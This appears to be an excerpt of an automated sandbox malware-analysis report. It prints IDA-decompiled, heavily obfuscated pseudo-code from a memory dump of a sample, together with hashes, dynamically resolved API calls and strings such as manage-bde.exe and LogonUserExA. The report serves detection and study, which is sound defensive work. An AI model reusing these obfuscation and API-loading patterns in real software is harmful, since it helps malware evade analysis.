Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: InfoNativeSystem
String ID: CoRevokeInitializeSpy$CreateActCtxW$KBDBGPH.DLL$`Nqt$iV
API String ID: 1721193555-2500971974
Opcode ID: f916064e1ee880b72f8ab8af1e2100ddee9514eeda8e0fcaf58ceba723022af0
Instruction ID: 5c5685f0f970fe33b2a26afb1359df98170404daaffcdb4d712268cdc5c6d809
Opcode Fuzzy Hash: f916064e1ee880b72f8ab8af1e2100ddee9514eeda8e0fcaf58ceba723022af0
Instruction Fuzzy Hash: 46319C75E50309AFCB00DFB9D9A56EC7FB1EF1A314F14807AC944A7361D2780A5ACB18

Uniqueness

Uniqueness Score: -1.00%

Function 0049FA11 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0049FA11(signed int __ecx, void* __edi, void* __esi) {
				void* _t17;
				void* _t21;
				void* _t24;
				intOrPtr _t25;
				char _t28;
				intOrPtr _t29;
				int _t32;
				int _t34;
				int _t36;
				intOrPtr _t40;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t74;
				intOrPtr _t82;
				void* _t87;
				short _t88;
				intOrPtr _t89;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t105;
				void* _t108;

				_t105 = __esi;
				_pop(_t17);
				_t94 = __edi - 0xda00;
				 *0x4ffb78 =  *0x4ffb78 + _t94;
				_t21 = _t17;
				_push(_t21);
				_t95 = _t94 + 0xee81;
				if(3 >> __ecx >= 0x10d982) {
					 *0x4fdafb =  *0x4fdafb;
				}
				_pop(_t24);
				_t87 = 0x9e85;
				_t25 = _t24;
				 *((intOrPtr*)(_t108 - 0x30)) = _t25;
				_t49 =  *0x4fdc23; // 0xffc0fd55
				if(_t49 < _t49) {
					_t49 = _t49 + _t49;
				}
				_t77 = 0x714d;
				0xe2 = _t25;
				 *0x4fff10 = 0xe2;
				if( *((intOrPtr*)(_t108 - 0x30)) == 0x7a) {
					_push( *((intOrPtr*)(_t108 - 0x1c)));
					_t82 =  *0x4fd13a; // 0x67ef
					 *0x4fff1b = 0xe2;
					_t43 = 0xe2;
					 *0x4fdadf =  *0x4fdadf + _t43;
					_t74 =  *0x4fdd37; // 0x338bf5
					_t49 = _t74 - 0x41ba34 + 1;
					_t77 = _t82 + _t82;
					_t45 = _t43;
					_push(0);
					 *((intOrPtr*)(_t108 - 0xc)) = _t45;
					 *0x4fff1e = 0xe2;
					_push(0);
					_push(0);
					_push(0);
					_push(E0049FAEC);
					_t95 = L0045F504;
					goto __edi;
				}
				 *0x4fff1b = 0xe2;
				_t96 = _t95 - 0xe2da;
				_t28 = 0xe2;
				 *0x4fff1e = _t28;
				if(_t96 >= 0) {
					 *(_t108 - 8) = 0x714d;
					_t77 =  !0x00006D16;
					_t87 = 0x9cf0;
					 *0x4fed1f =  *0x4fed1f - 0x9cf0;
					_t105 = _t105 + 0xc45c;
					 *0x4fff1d = _t28;
					_t96 = 0xffffffffffffffff;
				}
				 *0x4fd553 = _t28;
				 *0x4fd67f = _t28;
				_t88 = _t87 - 0x95;
				 *0x4feba7 =  *0x4feba7 - _t88;
				_t29 =  *0x4fff19; // -107
				 *0x4fff1b =  *0x4fff1b - _t29;
				 *0x4fd6d3 =  *0x4fd6d3 + _t96;
				_t32 = _t28;
				 *(_t108 - 8) = _t32;
				 *0x4fd1cc = _t88;
				_t89 =  *0x4fd1fe; // 0xa5ad
				 *0x4fff19 =  *0x4fff19 - _t89;
				 *0x4fd24c =  *0x4fd24c + _t105;
				_t34 =  *(_t108 - 8);
				 *0x4fd050 =  *0x4fd050 - _t34;
				 *(_t108 - 8) = _t34;
				_t36 = CloseHandle( *(_t108 - 0x14));
				 *(_t108 - 8) = _t36;
				if((_t77 + 0x00000071 & 0x00007f2d) < 0) {
					 *0x4fff1d = 0xd1;
					_t40 = 0;
					 *0x4fd59f = 0;
					if(0 > 0x22) {
						_t40 =  *0x4fd9ab; // 0x0
					}
					 *0x4fff1e =  *0x4fff1e - _t40;
					 *0x4fd79f =  *0x4fd79f + 0x11dfb8;
				}
				return  *((intOrPtr*)(_t108 - 0x34));
			}

0x0049fa11
0x0049fa13
0x0049fa19
0x0049fa1e
0x0049fa2e
0x0049fa37
0x0049fa38
0x0049fa47
0x0049fa4e
0x0049fa4e
0x0049fa5c
0x0049fa62
0x0049fa66
0x0049fa67
0x0049fa6a
0x0049fa72
0x0049fa74
0x0049fa74
0x0049fa79
0x0049fa81
0x0049fa82
0x0049fa8b
0x0049fa93
0x0049fa96
0x0049fa9e
0x0049faac
0x0049fab5
0x0049fabb
0x0049fac7
0x0049fac8
0x0049facf
0x0049fad2
0x0049fad3
0x0049fad8
0x0049fadd
0x0049fade
0x0049fadf
0x0049fae0
0x0049fae5
0x0049faea
0x0049faea
0x004a09ce
0x004a09d4
0x004a09d9
0x004a09da
0x004a09e2
0x004a09fd
0x004a0a08
0x004a0a14
0x004a0a18
0x004a0a20
0x004a0a25
0x004a0a2c
0x004a0a2c
0x004a0a2d
0x004a0a32
0x004a0a3f
0x004a0a42
0x004a0a4a
0x004a0a50
0x004a0a56
0x004a0a67
0x004a0a72
0x004a0a75
0x004a0a7c
0x004a0a83
0x004a0a89
0x004a0a92
0x004a0a9a
0x004a0aa4
0x004a0aad
0x004a0ab3
0x004a0abe
0x004a0ad4
0x004a0ad9
0x004a0ae1
0x004a0ae8
0x004a0aea
0x004a0afc
0x004a0b01
0x004a0b14
0x004a0b14
0x004a0b34

Strings

manage-bde.exe, xrefs: 004A09EA
MXEAgent.dll, xrefs: 004A0B25
KBDBGPH.DLL, xrefs: 004A0AEF
+q%, xrefs: 0049FAB0
z, xrefs: 0049FA87

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: +q%$KBDBGPH.DLL$MXEAgent.dll$manage-bde.exe$z
API String ID: 0-4013870304
Opcode ID: baf73faaa12d46c5fdcbf7112a4e742e8e15665ea3e003256ebf37ba6dff36b0
Instruction ID: d5216f5d67b3deac5e4620fee65669716ece1f97dd8d3f5cdce9148fdeab7dfb
Opcode Fuzzy Hash: baf73faaa12d46c5fdcbf7112a4e742e8e15665ea3e003256ebf37ba6dff36b0
Instruction Fuzzy Hash: 8951D176E043429FC740DFBAFC846E97BB6EB6A324710017BD858D3322D2781569CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004AB9BA Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 142COMMON

Download Yara Rule

APIs

_itoa.MSVCRT ref: 004ABB43

Strings

sqlsrv32.dll, xrefs: 004ABAC0
MXEAgent.dll, xrefs: 004ABAE2
qE, xrefs: 004ABAA5
CoRevokeInitializeSpy, xrefs: 004ABA22, 004ABB19
LogonUserExA, xrefs: 004ABBAE

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: _itoa
String ID: CoRevokeInitializeSpy$LogonUserExA$MXEAgent.dll$qE$sqlsrv32.dll
API String ID: 2976379300-3220349460
Opcode ID: f497d9cd1c487a9122ebb6e5e0520b5c5d012d93689b98cdc1865bf463e09fb7
Instruction ID: d7fc8a7100e1e513825b4fcc5e47ab26ad1637659ae1770db7e0e52c747a6943
Opcode Fuzzy Hash: f497d9cd1c487a9122ebb6e5e0520b5c5d012d93689b98cdc1865bf463e09fb7
Instruction Fuzzy Hash: 2E51B37AE502499FCB009FB8E8D01ED7BB1EF2A310F04807BD94197756E3794955CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004D9320 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004D9320(void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				char* _t32;
				void* _t53;
				void* _t59;
				void* _t62;

				_t59 = __esi;
				_t16 =  *0x4fe48b();
				 *0x4fd188 = 0;
				_t53 = 0x898b15;
				 *((intOrPtr*)(_t62 - 8)) = _t16;
				 *0x4fd13a =  *0x4fd13a;
				_t48 = 0x7add;
				_t18 =  *((intOrPtr*)(_t62 - 8));
				_push(0x3c);
				 *0x4fd51b = _t18;
				 *((intOrPtr*)(_t62 - 0xc)) = _t18;
				_t32 = "deskperf.dll";
				L004BCECA(_t32, 0x7add, __edi + 1, __esi, _t32, _t32, 1);
				 *0x4fd15c = 0x7add;
				 *((intOrPtr*)(_t62 - 8)) =  *((intOrPtr*)(_t62 - 0xc));
				if(_t32 < _t32) {
					 *((intOrPtr*)(_t62 - 0x10)) =  *((intOrPtr*)(_t62 - 0x10)) + 0x7add;
					_t48 = 0x761d;
					 *0x4fd1b0 = 0;
				}
				_t23 =  *((intOrPtr*)(_t62 - 8));
				if(_t23 == 0x19) {
					if(_t23 <= 0x242890) {
						 *((intOrPtr*)(_t62 - 0xc)) =  *((intOrPtr*)(_t62 - 0xc)) + 0xef1c9;
						 *((intOrPtr*)(_t62 - 0x10)) = 0xf29de;
						_t48 = 0x5f81;
					}
					 *0x4fd180 = _t48;
					 *0x4fff18 =  *0x4fff18 + _t53;
				}
				 *0x4fd2fd =  *0x4fd2fd + _t59 + 0xa37138;
				_t24 = _t62 - 0x68;
				 *((intOrPtr*)(_t62 - 8)) = _t24;
				_push(_t24);
				_push(0);
				_push(_t24);
				_push(E004D9455);
				_push(L00460BDB);
				return _t24;
			}

0x004d9320
0x004d9336
0x004d9343
0x004d934f
0x004d9355
0x004d9369
0x004d9372
0x004d9377
0x004d937a
0x004d937d
0x004d9387
0x004d938a
0x004d9395
0x004d939d
0x004d93a4
0x004d93b4
0x004d93bb
0x004d93c8
0x004d93cc
0x004d93cc
0x004d93d3
0x004d93dd
0x004d93e4
0x004d93eb
0x004d93ee
0x004d93f3
0x004d93f3
0x004d93f7
0x004d940d
0x004d940d
0x004d9421
0x004d9431
0x004d9443
0x004d9446
0x004d9447
0x004d9449
0x004d944a
0x004d944f
0x004d9454

APIs

CoInitialize.OLE32 ref: 004D9336

Strings

PortableDeviceWMDRM.dll, xrefs: 004D9364
manage-bde.exe, xrefs: 004D93A7
TpWaitForAlpcCompletion, xrefs: 004D9326, 004D93B6
deskperf.dll, xrefs: 004D938A, 004D9393, 004D9394
user.exe, xrefs: 004D9358

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Initialize
String ID: PortableDeviceWMDRM.dll$TpWaitForAlpcCompletion$deskperf.dll$manage-bde.exe$user.exe
API String ID: 2538663250-592337076
Opcode ID: 11e5bbb31c38cb4a6802451b51d176540f15debc2bc93ed038c560d37124de06
Instruction ID: fcd3f3d7b74b07814c326c855e91437c74c6e0eb2906f68594df8c0c052c6c2b
Opcode Fuzzy Hash: 11e5bbb31c38cb4a6802451b51d176540f15debc2bc93ed038c560d37124de06
Instruction Fuzzy Hash: D0318161E103059FDB009F65D8906EE77B1EB19314F44807BEA15E7352E2784905CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004B592B Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E004B592B(char __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t33;
				CHAR* _t36;
				struct HINSTANCE__* _t37;
				signed int _t39;
				signed int _t41;
				signed int _t46;
				void* _t58;
				char* _t59;
				signed int _t63;
				void* _t75;
				signed int _t87;
				intOrPtr _t89;
				void* _t90;
				signed int _t99;
				signed short _t100;
				signed int _t101;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t113;

				_t105 = __edi;
				_t98 = __edx;
				_t110 = __esi + 1;
				 *0x4fff1b = __eax;
				 *0x4fd723 =  *0x4fd723 + __edi;
				 *0x4fff1e =  *0x4fff1e - 0xe7;
				_t33 = E004F4B5F(__ebx, __ecx, __edx, __eflags);
				_t106 = _t105 - 0xd4cd;
				 *(_t113 - 8) = _t33;
				if(_t33 >= 0x1614ab) {
					L6:
					goto L7;
				} else {
					 *0x4fd0e4 =  *0x4fd0e4 -  !0x325db3;
					_t87 =  !0x6776;
					if( !0x6776 <  !0x6776) {
						L7:
						if(0x1e16cc < 0x3151) {
						}
						_t87 = 0x8029;
					} else {
						_t98 = __edx - 1;
						 *0x4fd1fc = _t98;
						 *0x4fd21a = _t98;
						if(_t110 != 0) {
							 *0x4fff1d = 0;
							_t106 = 0;
							if(0 > 0) {
								goto L6;
							} else {
								if(0 == 0) {
									 *0x4fd347 =  *0x4fd347;
									goto L6;
								}
							}
						}
					}
				}
				_t99 =  !_t98;
				_t36 =  *(_t113 - 8);
				 *(_t113 - 0x60) = _t36;
				 *(_t113 - 8) = _t36;
				_t37 = GetModuleHandleA( *(_t113 - 0x60));
				if((_t99 & 0x00920a8d) != 0) {
					 *0x4fff19 = _t37;
					_t110 = 0xffffffffffff35bf;
					if(_t106 == 0) {
						 *0x4fff1d = _t37 +  *0x4fff1d;
						_t106 = 0x4fff1d;
						 *(_t113 - 8) = _t37;
						 *(_t113 - 8) = _t37;
						 *((intOrPtr*)(_t113 - 0x18)) = 0x2ffacd;
						 *0x4fd15c = _t87 + 0x66;
						_t87 =  *0x4fd18e; // 0xf0ad
						_t99 = 0x941c;
					}
				}
				 *0x4fd1f6 = _t99;
				if(_t37 == 0) {
					return _t37;
				} else {
					 *(_t113 - 8) = _t37;
					_t39 =  *(_t113 - 8);
					 *(_t113 - 0x14) = _t39;
					 *(_t113 - 8) = _t39;
					 *(_t113 - 0xc) =  !_t39;
					_t41 =  *(_t113 - 8);
					_t58 =  !( *(_t113 - 0x14) - 0x33ba4a) +  !( *(_t113 - 0x14) - 0x33ba4a);
					 *(_t113 - 0x58) = _t41;
					_t89 = _t87 + 0x81ae;
					 *(_t113 - 8) = _t41;
					 *0x4fff11 =  *0x4fff11 - 0x1950ff;
					if(_t58 <= 0x34) {
						_t75 = _t58 + 0x359a08;
						if(_t75 == _t75) {
							 *0x4fd10a =  *0x4fd10a - _t75;
						}
						_t89 =  *0x4fd158; // 0x7d9f
					}
					_t90 = _t89 - 0x72f4;
					_t100 =  *0x4fd1d4; // 0x9964
					if((_t100 & 0x00009a60) >= 0 || (_t100 & 0x0000aa25) >= 0) {
						_t106 = _t106;
					}
					_t46 =  *(_t113 - 8);
					_push(0);
					if(_t106 + 1 >= 0) {
						L26:
						_t59 = "api-ms-win-core-libraryloader-l1-1-0.dll";
					} else {
						_t59 = "msobjs.dll";
						if(_t90 != _t90) {
							if(_t90 > _t90) {
								_t90 = _t90;
								 *0x4fd1c4 = _t100;
								_t100 = 0xa45a;
								 *0x4fff19 = _t46;
							}
							 *0x4fff1d = _t46;
							goto L26;
						}
					}
					_t63 =  !( &(_t59[_t46]) - _t46 + 0x2a4521);
					if(_t63 < _t63) {
					}
					_t101 =  *0x4fd1b0; // 0x8660
					_push( *0x4fd118);
					 *0x4fff17 =  *0x4fff17 + (_t101 | 0x000086e7);
					 *(_t113 - 8) = _t46;
					_push(0);
					_push(0);
					_push(_t63);
					_push(E004B5BB7);
					_push(L0045F504);
					return ( !_t46 ^ 0x0000002a) - 0x2c24df;
				}
			}

0x004b592b
0x004b592b
0x004b592b
0x004b592c
0x004b593c
0x004b5943
0x004b5949
0x004b594e
0x004b5953
0x004b595b
0x00000000
0x00000000
0x004b595d
0x004b5966
0x004b5974
0x004b5978
0x004b59b1
0x004b59ba
0x004b59ba
0x004b59d1
0x004b597d
0x004b597d
0x004b597e
0x004b5985
0x004b5997
0x004b5999
0x004b599e
0x004b59a3
0x00000000
0x004b59a5
0x004b59a7
0x004b59a9
0x00000000
0x004b59a9
0x004b59a7
0x004b59a3
0x004b5997
0x004b5978
0x004b59d5
0x004b59d7
0x004b59da
0x004b59dd
0x004b59e6
0x004b59f2
0x004b59f4
0x004b59fc
0x004b5a04
0x004b5a06
0x004b5a14
0x004b5a15
0x004b5a18
0x004b5a25
0x004b5a33
0x004b5a3d
0x004b5a4b
0x004b5a4b
0x004b5a04
0x004b5a4f
0x004b5a59
0x004b6675
0x004b5a61
0x004b5a61
0x004b5a69
0x004b5a6c
0x004b5a71
0x004b5a76
0x004b5a82
0x004b5a87
0x004b5a8c
0x004b5a8f
0x004b5a94
0x004b5a9c
0x004b5aa5
0x004b5aa7
0x004b5aaf
0x004b5ab1
0x004b5ab1
0x004b5abb
0x004b5abb
0x004b5ac2
0x004b5aca
0x004b5ad6
0x004b5ae9
0x004b5ae9
0x004b5aed
0x004b5af0
0x004b5af6
0x004b5b54
0x004b5b54
0x004b5af8
0x004b5b10
0x004b5b17
0x004b5b1f
0x004b5b21
0x004b5b23
0x004b5b34
0x004b5b38
0x004b5b38
0x004b5b45
0x00000000
0x004b5b4e
0x004b5b17
0x004b5b64
0x004b5b68
0x004b5b68
0x004b5b75
0x004b5b7c
0x004b5b94
0x004b5b9a
0x004b5ba7
0x004b5ba9
0x004b5bab
0x004b5bac
0x004b5bb1
0x004b5bb6
0x004b5bb6

APIs

GetModuleHandleA.KERNEL32(?), ref: 004B59E6

Strings

CreateActCtxW, xrefs: 004B5B00
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004B5B54, 004B5BAB
Mqt, xrefs: 004B59E6
msobjs.dll, xrefs: 004B5B10

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: HandleModule
String ID: CreateActCtxW$api-ms-win-core-libraryloader-l1-1-0.dll$msobjs.dll$Mqt
API String ID: 4139908857-963542520
Opcode ID: 30de7c3139e3950cad2b1c3647115b13316e59ff75e8d6dba072679b0ac7987f
Instruction ID: cdde2c0460f4f1ef0c3d0a80f968bfb0104ce2fcdff03bd90f71ad18bec8bab1
Opcode Fuzzy Hash: 30de7c3139e3950cad2b1c3647115b13316e59ff75e8d6dba072679b0ac7987f
Instruction Fuzzy Hash: 7F51E166A447468FCB00DF78E9943EA7BB2EB39310F04807BC949E7366E2790954C76C

Uniqueness

Uniqueness Score: -1.00%

Function 0048DC33 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 0048DC38

Strings

CreateActCtxW, xrefs: 0048DC71
scrptadm.dll, xrefs: 0048DCD4
speechuxcpl.dll, xrefs: 0048DCB3
RegQueryInfoKeyW, xrefs: 0048DE15

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CreateActCtxW$RegQueryInfoKeyW$scrptadm.dll$speechuxcpl.dll
API String ID: 190572456-3195929502
Opcode ID: 220c494e4640e2eb2bebfd6fef18e98c390cd251283cbb4d1ab6200a0649556d
Instruction ID: 6c309eb8e244b88cfdeaa480c2a15dd909e599f106fd93984a5e010a6301a559
Opcode Fuzzy Hash: 220c494e4640e2eb2bebfd6fef18e98c390cd251283cbb4d1ab6200a0649556d
Instruction Fuzzy Hash: 03519075E543099FCB00EFB9E9946ED7BB2EF2A310F04807BC55497362E2790A59CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004972A8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00497384

Strings

PortableDeviceWMDRM.dll, xrefs: 00497346
MXEAgent.dll, xrefs: 004973E9
EhStorAuthn.exe, xrefs: 00497335
RegQueryInfoKeyW, xrefs: 00497444

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: EhStorAuthn.exe$MXEAgent.dll$PortableDeviceWMDRM.dll$RegQueryInfoKeyW
API String ID: 190572456-1340681786
Opcode ID: 7f860ac6e14c01f1db61c73858f6abdbfe197210ed3096d0d195d6c5c8dd8799
Instruction ID: c657f8d1f113261f9da3d6a64701751c1bbb8c3d550fba3d7866721f27a3274d
Opcode Fuzzy Hash: 7f860ac6e14c01f1db61c73858f6abdbfe197210ed3096d0d195d6c5c8dd8799
Instruction Fuzzy Hash: 5E41B2A5E283459FCB01DFB8EC906E93FB1EB2A314F44417AC94597362D2390A18C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0048D15E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E0048D15E(signed int __eax, void* __ecx, short __edx, void* __edi, void* __esi) {
				signed int _t25;
				signed int _t27;
				signed int _t28;
				_Unknown_base(*)()* _t29;
				char* _t32;
				signed int _t34;
				signed int _t35;
				signed int _t49;
				char* _t53;
				char* _t54;
				intOrPtr _t63;
				signed int _t65;
				signed int _t71;
				short _t73;
				void* _t79;
				void* _t81;
				signed int _t83;
				void* _t87;

				_t81 = __esi;
				_t79 = __edi;
				_t25 = __eax;
				 *0x4fd126 =  *0x4fd126 - __ecx;
				 *0x4fd1c0 = __edx;
				 *((intOrPtr*)(_t87 - 0x20)) = __eax;
				 *0x4fff16 =  *0x4fff16 - 0x75;
				_t71 = __edx - 0x7de72b;
				if((_t71 & 0x0084f96d) >= 0) {
					 *0x4fff18 =  *0x4fff18 - _t71;
				}
				_t83 = _t81 - 0x00a854b8 | 0x0000cb74;
				 *0x4fff1d =  *0x4fff1d + _t25;
				if(_t25 >= 0) {
					_t79 = _t79 - 0xd9d488;
					 *0x4fff10 = _t25;
				}
				 *(_t87 - 8) = _t25;
				L00460156(0x45d35a, 6, _t71, _t79, _t83);
				_t27 =  *(_t87 - 8);
				_push( *((intOrPtr*)(_t87 - 0x20)));
				 *0x4fd132 =  *0x4fd132 - 6;
				 *(_t87 - 0xc) =  *(_t87 - 0xc) - 6;
				if((_t71 + 0x00000001 & 0x0000009a) < 0) {
				}
				 *(_t87 - 8) = _t27;
				_t28 =  *(_t87 - 8);
				_push( *0x4fd473);
				if(0x6a2e != 0x6a2e) {
					L9:
					 *0x4fff1e = _t28;
				} else {
					if(_t28 < 0) {
						 *0x4fff1b = _t28;
						goto L9;
					}
				}
				_t29 = GetProcAddress();
				_t73 =  *0x4fd20a; // 0x178
				 *(_t87 - 8) = _t29;
				_t49 = _t28 | 0x0036ad6c;
				 *0x4fddb7 =  *0x4fddb7 + _t49;
				 *(_t87 - 0xc) = _t49;
				_t63 =  *0x4fd128; // 0xb97d
				_t65 =  !(_t63 - 0x66);
				_t32 = "CreateActCtxW";
				if(_t49 >= 0x379d4c) {
					L15:
					 *0x4fd1de = _t73;
				} else {
					if(_t49 <= _t49) {
						_t49 = 0x4cd412;
						 *0x4fd12a =  *0x4fd12a + _t65;
						 *0x4fd142 =  *0x4fd142 + _t65;
					}
					if(_t65 < _t65) {
						goto L15;
					}
				}
				 *0x4fff19 = _t32;
				 *0x4fff1e = 0xe7;
				_t34 =  *(_t87 - 8);
				 *0x4fe21f = _t34;
				 *(_t87 - 8) = _t49;
				 *(_t87 - 8) = _t34;
				_t53 = "mtxclu.dll";
				 *(_t87 - 0xc) =  &(_t53[ *(_t87 - 0xc)]);
				_t35 =  *(_t87 - 8);
				_push(0);
				_t54 =  &(_t53[_t53]);
				 *(_t87 - 8) = _t35;
				_push(_t54);
				_push(_t54);
				_push(_t54);
				_push(E0048D321);
				_push(L0045F504);
				return _t35;
			}

0x0048d15e
0x0048d15e
0x0048d15e
0x0048d168
0x0048d175
0x0048d17c
0x0048d17f
0x0048d18b
0x0048d197
0x0048d199
0x0048d199
0x0048d1a7
0x0048d1ad
0x0048d1b5
0x0048d1b7
0x0048d1bd
0x0048d1bd
0x0048d1d2
0x0048d1d7
0x0048d1dc
0x0048d1df
0x0048d1e3
0x0048d1ea
0x0048d1fb
0x0048d1fb
0x0048d208
0x0048d212
0x0048d215
0x0048d226
0x0048d242
0x0048d24a
0x0048d22b
0x0048d23a
0x0048d23c
0x00000000
0x0048d23c
0x0048d23a
0x0048d251
0x0048d257
0x0048d25e
0x0048d265
0x0048d26b
0x0048d271
0x0048d274
0x0048d281
0x0048d286
0x0048d291
0x0048d2b6
0x0048d2b6
0x0048d293
0x0048d296
0x0048d298
0x0048d29d
0x0048d2a4
0x0048d2a4
0x0048d2ae
0x00000000
0x0048d2b0
0x0048d2ae
0x0048d2c7
0x0048d2d6
0x0048d2db
0x0048d2de
0x0048d2e3
0x0048d2ed
0x0048d2f8
0x0048d2fd
0x0048d300
0x0048d308
0x0048d30a
0x0048d310
0x0048d313
0x0048d314
0x0048d315
0x0048d316
0x0048d31b
0x0048d320

APIs

GetProcAddress.KERNEL32(?), ref: 0048D251

Strings

CreateActCtxW, xrefs: 0048D286
mtxclu.dll, xrefs: 0048D2F8, 0048D313, 0048D314, 0048D315
kO, xrefs: 0048D2F2
msobjs.dll, xrefs: 0048D163

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CreateActCtxW$kO$msobjs.dll$mtxclu.dll
API String ID: 190572456-1627613985
Opcode ID: 06166bc400bb9321cb7f52972ec513397521e9a154db3a9fde225f9c59b31994
Instruction ID: bd81ca2fd455b4ad7d84e73116efb65ee0f0d701727f5849dd0b881a245fb02f
Opcode Fuzzy Hash: 06166bc400bb9321cb7f52972ec513397521e9a154db3a9fde225f9c59b31994
Instruction Fuzzy Hash: FA41BE75E04305ABDB00AFB4E9852ED7BB2EF2A314F0041BAC944A7366E3790A55CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00478C43 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00478C43() {
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t29;
				char* _t38;
				void* _t48;
				intOrPtr _t58;
				short _t59;
				intOrPtr _t60;
				void* _t63;
				signed int _t64;
				void* _t65;

				 *0x4fd172 = _t48 - 1;
				_t58 =  *0x4fd1c0; // 0x0
				_t59 = _t58 - 0x9afb;
				 *0x4fd20e = _t59;
				_t38 = "TpWaitForAlpcCompletion";
				 *0x4fd1b4 = _t59;
				_t60 =  *0x4fd1e8; // 0x8818
				_t24 = GetProcAddress( *0x4fd3c3,  *(_t65 - 0x20));
				_t62 = _t60 - 0xa2 + 1;
				 *0x4feb3f =  *0x4feb3f + _t60 - 0xa2 + 1;
				if((_t64 & 0x0096c1a4) >= 0) {
					_t64 = _t64 - 0xbfbe;
					 *0x4fff1b = _t24;
					 *0x4fff1e = _t24;
					_t63 = _t63 + _t24;
					_t38 = 0x1868db;
				}
				 *(_t65 - 8) = _t24;
				_push(_t38);
				_push(_t38);
				_push(1);
				L004618BC(_t24, _t62);
				 *0x4fd120 =  *0x4fd120 -  !0x6fdb;
				L00461400( *(_t65 - 8) - 0x2c07, "ehshell.dll", 0, _t62, _t63, _t64, "ehshell.dll");
				_t29 =  *(_t65 - 8);
				 *0x4fd9af = _t29;
				 *(_t65 - 8) = _t29;
				_push(1);
				_push(0);
				_push( *((intOrPtr*)(_t65 - 0xc)));
				_push(E00478D60);
				goto __ebx;
			}

0x00478c53
0x00478c5d
0x00478c64
0x00478c69
0x00478ca6
0x00478cbd
0x00478cc4
0x00478cce
0x00478cd4
0x00478cd5
0x00478ce1
0x00478ce3
0x00478ce8
0x00478cf6
0x00478cfb
0x00478d00
0x00478d00
0x00478d05
0x00478d08
0x00478d09
0x00478d0a
0x00478d0c
0x00478d1e
0x00478d3a
0x00478d42
0x00478d45
0x00478d4a
0x00478d4f
0x00478d51
0x00478d53
0x00478d54
0x00478d5e

APIs

GetProcAddress.KERNEL32(?), ref: 00478CCE

Strings

0Lqt, xrefs: 00478D45
TpWaitForAlpcCompletion, xrefs: 00478CA6, 00478D08, 00478D09
ehshell.dll, xrefs: 00478D34, 00478D39
user.exe, xrefs: 00478C75

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 0Lqt$TpWaitForAlpcCompletion$ehshell.dll$user.exe
API String ID: 190572456-652814035
Opcode ID: fa2e3bb16bae11f7e51dbe6b1bec13bc37c9d30a856cc0c611c0cfd9afb4acc2
Instruction ID: dbaa5687ea7d8e2926c1e7c2d21cda1b783587ae10098139efa24a91e126370b
Opcode Fuzzy Hash: fa2e3bb16bae11f7e51dbe6b1bec13bc37c9d30a856cc0c611c0cfd9afb4acc2
